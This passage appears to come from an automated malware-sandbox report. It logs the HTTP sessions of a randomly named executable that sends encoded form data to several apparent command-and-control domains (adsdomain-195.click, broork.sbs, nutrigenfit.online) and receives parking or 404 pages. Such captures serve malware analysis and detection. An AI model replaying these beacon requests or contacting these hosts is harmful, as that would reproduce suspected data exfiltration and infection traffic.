                                                                                                                                 22 | 192.168.2.8 | 49730 | 199.59.243.227 | 80 | 5072 | C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                                                                 Oct 29, 2024 16:55:36.717390060 CET | 719 | OUT | POST /xene/ HTTP/1.1
                                                                                                                                Host: www.adsdomain-195.click
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.adsdomain-195.click
                                                                                                                                Referer: http://www.adsdomain-195.click/xene/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 224
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Ascii: edD=lS3Gu6UA5k0FXr0kRVCNg5pxm2cLszAfxTBViIBNNiDt7DcSIsdftb3xuRU0Mmo17wDl/AonH8SYDD8TJrd1GIVGMEUc+LW/p2EVSmwNzRtFtzu4lbgfTRkaAhip94Kdbsy3+9w2qb0MGCb1o96DUwvUJziNgyMrWqPjO6Uti4doQ0TCNwGzq6Vnmux6MF/aIfP0iadjgfaXd1wXl/Hg/0EG/GWH
                                                                                                                                 Oct 29, 2024 16:55:37.433291912 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                date: Tue, 29 Oct 2024 15:55:36 GMT
                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                content-length: 1146
                                                                                                                                x-request-id: 687bb9dc-2520-44a3-be48-011c07e30e39
                                                                                                                                cache-control: no-store, max-age=0
                                                                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                vary: sec-ch-prefers-color-scheme
                                                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_njxd0w4B1slsBO5Y66xO3lN7AN+5YWz5VevXvFNbjhD7Br4eo/KTsn/VE6js8pVaRYwRKKGz/PdCrySj/UOB2g==
                                                                                                                                set-cookie: parking_session=687bb9dc-2520-44a3-be48-011c07e30e39; expires=Tue, 29 Oct 2024 16:10:37 GMT; path=/
                                                                                                                                connection: close
                                                                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_njxd0w4B1slsBO5Y66xO3lN7AN+5YWz5VevXvFNbjhD7Br4eo/KTsn/VE6js8pVaRYwRKKGz/PdCrySj/UOB2g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                                 Oct 29, 2024 16:55:37.433309078 CET | 599 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNjg3YmI5ZGMtMjUyMC00NGEzLWJlNDgtMDExYzA3ZTMwZTM5IiwicGFnZV90aW1lIjoxNzMwMjE3Mz
                                                                                                                                 Oct 29, 2024 16:55:37.433325052 CET | 599 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNjg3YmI5ZGMtMjUyMC00NGEzLWJlNDgtMDExYzA3ZTMwZTM5IiwicGFnZV90aW1lIjoxNzMwMjE3Mz


                                                                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                 23 | 192.168.2.8 | 49731 | 199.59.243.227 | 80 | 5072 | C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                                                                 Oct 29, 2024 16:55:39.493612051 CET | 1736 | OUT | POST /xene/ HTTP/1.1
                                                                                                                                Host: www.adsdomain-195.click
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.adsdomain-195.click
                                                                                                                                Referer: http://www.adsdomain-195.click/xene/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 1240
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Ascii: edD=lS3Gu6UA5k0FXr0kRVCNg5pxm2cLszAfxTBViIBNNj7t6xUSa/1fsb3xyBUPMmp170nh/AkNH5WYAg0TdOh1d4VGFkUIzrWqpygRSmgNzRtFtxG4svUfDhkZHhil54L6bsrM+7sMro8MGiL1qvCDXQvSOzi8gyAKWqjFO5IHi41oUjqnX0Prp5oY/cofX225CePlippGsYKBW0U/keeCl1UI1C7w2e5F5i8SPMxtIeqSQMDd8tE1jQRmRLL1bV+2mP5lTodsUBS/BqaLN4oTOeBLg6qFs+WSYABcv75nfuDI88pc9C2pyHxEyo+F98deuiSW3IwVMngV4lFTFMQzhwdYMNlHZiGhcefd4+FUsfjvHxS07rQNpjz+pPnv/hErcXd134F992MsMkGN3rDlNvdQYREEYIyL2qkJBtC2MvVSW5muFnM/TCSSRZnSf8GVTRWlarL3+kAhcHNo6LF77C6bsUP7rELNiGUq/91bn0obsdlfnQm9ClHVGcGHzGMd4q28FBN4VEpyFPrmqbKOe6n9sQpkP4IJlYdB4Em3T+nR1e9ZVDJP6qWexuBxb3E00lILBdzWBosJLlIkMvIemw/TzDahekc8XpdSl4SUCT664L7Ej4jY8Q8R9uOXEswDI/1Kh0xmksb2rizOiWB9VkEBSH9ffCpAtJnLobXLPvOT8+wTnzwd3J982liFXsQYl2VnEPUHXlpRu9uoKgdd+/uxXPOd0UyWACLpNRDOStPce62psO2LDopgFZSdDG6K0mHj9EzG9mBIErmXm2hnlHc9+Uw3PFT2wOBk+0QJ8tNu+DS/5zSFID4sDf2F0HoVcQogoCOcoZlcjaU+cze1T/vq2pd0grhqme4rNmQoguKz1BWSLXPA1GcJjCuxUvzMX07q7VaVUrvXN832vWbzQMjgL13J6RhX7wLKU3MkMP9wVdQ6dUYSoeABAZNUoUmlrVXWHHP1jtrCDGVH/Vn3E0f9pq+ABeV5w1sO1emt85rSnSrk [TRUNCATED]
                                                                                                                                 Oct 29, 2024 16:55:40.087987900 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                date: Tue, 29 Oct 2024 15:55:39 GMT
                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                content-length: 1146
                                                                                                                                x-request-id: c88bc650-8b17-4393-abf9-13589ef47222
                                                                                                                                cache-control: no-store, max-age=0
                                                                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                vary: sec-ch-prefers-color-scheme
                                                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_njxd0w4B1slsBO5Y66xO3lN7AN+5YWz5VevXvFNbjhD7Br4eo/KTsn/VE6js8pVaRYwRKKGz/PdCrySj/UOB2g==
                                                                                                                                set-cookie: parking_session=c88bc650-8b17-4393-abf9-13589ef47222; expires=Tue, 29 Oct 2024 16:10:39 GMT; path=/
                                                                                                                                connection: close
                                                                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_njxd0w4B1slsBO5Y66xO3lN7AN+5YWz5VevXvFNbjhD7Br4eo/KTsn/VE6js8pVaRYwRKKGz/PdCrySj/UOB2g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                                 Oct 29, 2024 16:55:40.088025093 CET | 599 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzg4YmM2NTAtOGIxNy00MzkzLWFiZjktMTM1ODllZjQ3MjIyIiwicGFnZV90aW1lIjoxNzMwMjE3Mz
                                                                                                                                 Oct 29, 2024 16:55:40.088213921 CET | 599 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzg4YmM2NTAtOGIxNy00MzkzLWFiZjktMTM1ODllZjQ3MjIyIiwicGFnZV90aW1lIjoxNzMwMjE3Mz


                                                                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                 24 | 192.168.2.8 | 49732 | 199.59.243.227 | 80 | 5072 | C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                                                                 Oct 29, 2024 16:55:42.173944950 CET | 434 | OUT | GET /xene/?mRR=Vxudf0fHzLw84n3P&edD=oQfmtMAR504qWoEoIiuXkIZ390sDtx871CN+h8gaaxvvjR4IOOhM8LL7s1MwTzNJoD6YjSoePunXYwEMUYhUEvd3KGx73JHR40wuRl04yT55myu+mdIWD34OfxSC3JH3Pw== HTTP/1.1
                                                                                                                                Host: www.adsdomain-195.click
                                                                                                                                Accept: */*
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Connection: close
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                 Oct 29, 2024 16:55:42.781121016 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                date: Tue, 29 Oct 2024 15:55:42 GMT
                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                content-length: 1518
                                                                                                                                x-request-id: 9088cb2f-4f78-4c52-9e13-19223909779e
                                                                                                                                cache-control: no-store, max-age=0
                                                                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                vary: sec-ch-prefers-color-scheme
                                                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_tAtugdEUnHJx4gSfT/E1vkopTnQvxNIIU0TpU7anfVs20JR2rWYqrh1NcFN0SO9FDTP7m8lupg3e2Oq6sc/Ptw==
                                                                                                                                set-cookie: parking_session=9088cb2f-4f78-4c52-9e13-19223909779e; expires=Tue, 29 Oct 2024 16:10:42 GMT; path=/
                                                                                                                                connection: close
Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_tAtugdEUnHJx4gSfT/E1vkopTnQvxNIIU0TpU7anfVs20JR2rWYqrh1NcFN0SO9FDTP7m8lupg3e2Oq6sc/Ptw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"

Timestamp: Oct 29, 2024 16:55:42.781181097 CET | Bytes transferred: 971 | Direction: IN
Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOTA4OGNiMmYtNGY3OC00YzUyLTllMTMtMTkyMjM5MDk3NzllIiwicGFnZV90aW1lIjoxNzMwMjE3Mz


Session ID: 25 | Source IP: 192.168.2.8 | Source Port: 49733 | Destination IP: 163.44.176.12 | Destination Port: 80 | PID: 5072 | Process: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe

Timestamp: Oct 29, 2024 16:55:48.818051100 CET | Bytes transferred: 672 | Direction: OUT
Data:
POST /mivl/ HTTP/1.1
Host: www.broork.sbs
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Origin: http://www.broork.sbs
Referer: http://www.broork.sbs/mivl/
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Content-Length: 204
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Data Ascii: edD=AAp9nusr7CDMoMRwVXFuM8u/kVmV7Tl/de4ACBsXnExgX06ciMrWCxtbauyGFa1LU5AHvn8Xks3HnrQNcHJlVfy1lsZq54bwenPMSKlcSUmDFub8ctrPPiGweJDO0UW+NB4ku9rJpK+XJD9ozuwqPDp3WNQ+hYqmnzxT5xIIypzOSqbjZ0t5kQnAHWQWn+MUHwJSpNA=

Timestamp: Oct 29, 2024 16:55:49.707384109 CET | Bytes transferred: 1236 | Direction: IN
Data:
HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Tue, 29 Oct 2024 15:55:49 GMT
server: LiteSpeed
vary: User-Agent
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0

Timestamp: Oct 29, 2024 16:55:49.707557917 CET | Bytes transferred: 271 | Direction: IN
Data Ascii: .15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this si


Session ID: 26 | Source IP: 192.168.2.8 | Source Port: 49734 | Destination IP: 163.44.176.12 | Destination Port: 80 | PID: 5072 | Process: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe

Timestamp: Oct 29, 2024 16:55:51.359780073 CET | Bytes transferred: 692 | Direction: OUT
Data:
POST /mivl/ HTTP/1.1
Host: www.broork.sbs
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Origin: http://www.broork.sbs
Referer: http://www.broork.sbs/mivl/
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Content-Length: 224
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Data Ascii: edD=AAp9nusr7CDMrthwXwRuLcu8hVmViDlzdekACEcHmypgXVKcjNrWLhtbROyHI60JU58PviEXkofHnqgNdwlmTfy3uMZskIbwenPMSKh6SUuDCfr8eIHMQSGzdJDO+EW6NB4Wu/espM6XJGBoy/wpWzpLYtRJx6ypiClvnQEQx/jya8qJDWl/nQPrHV4giJR8dTZi3aU3xwXKFiVnqnPB+d7QRYeE

Timestamp: Oct 29, 2024 16:55:52.267349005 CET | Bytes transferred: 1236 | Direction: IN
Data:
HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Tue, 29 Oct 2024 15:55:52 GMT
server: LiteSpeed
vary: User-Agent
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0

Timestamp: Oct 29, 2024 16:55:52.267368078 CET | Bytes transferred: 271 | Direction: IN
Data Ascii: .15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this si


Session ID: 27 | Source IP: 192.168.2.8 | Source Port: 49735 | Destination IP: 163.44.176.12 | Destination Port: 80 | PID: 5072 | Process: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe

Timestamp: Oct 29, 2024 16:55:53.905730009 CET | Bytes transferred: 1709 | Direction: OUT
Data:
POST /mivl/ HTTP/1.1
Host: www.broork.sbs
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Origin: http://www.broork.sbs
Referer: http://www.broork.sbs/mivl/
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Content-Length: 1240
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Data Ascii: edD=... [TRUNCATED]

Timestamp: Oct 29, 2024 16:55:54.805387020 CET | Bytes transferred: 1236 | Direction: IN
Data:
HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Tue, 29 Oct 2024 15:55:54 GMT
server: LiteSpeed
vary: User-Agent
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0

Timestamp: Oct 29, 2024 16:55:54.805699110 CET | Bytes transferred: 271 | Direction: IN
Data Ascii: .15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this si


Session ID: 28 | Source IP: 192.168.2.8 | Source Port: 49736 | Destination IP: 163.44.176.12 | Destination Port: 80 | PID: 5072 | Process: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe

Timestamp: Oct 29, 2024 16:55:56.447685957 CET | Bytes transferred: 425 | Direction: OUT
Data:
GET /mivl/?edD=NCBdkbAo51Pk6OQCOHBLNPGGoFWb7jFDRfsqOlllsQkjLkqguOrgRg1KSY2RNLpxIpBa/WYuubaTkbJsfRdnK6r1gpJDlK+mMheAcqBYNXKJFvncR+Lje3KwNZ7V3SHyOg==&mRR=Vxudf0fHzLw84n3P HTTP/1.1
Host: www.broork.sbs
Accept: */*
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36

Timestamp: Oct 29, 2024 16:55:57.317842960 CET | Bytes transferred: 1236 | Direction: IN
Data:
HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Tue, 29 Oct 2024 15:55:57 GMT
server: LiteSpeed
vary: User-Agent
                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0
                                                                                                                                Oct 29, 2024 16:55:57.317871094 CET271INData Raw: 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20
                                                                                                                                Data Ascii: .15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this si


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.8 | 49737 | 195.110.124.133 | 80 | 5072 | C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
Timestamp | Bytes transferred | Direction | Data
Oct 29, 2024 16:56:02.589799881 CET | 696 | OUT | POST /uye5/ HTTP/1.1
Host: www.nutrigenfit.online
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Origin: http://www.nutrigenfit.online
Referer: http://www.nutrigenfit.online/uye5/
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Content-Length: 204
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
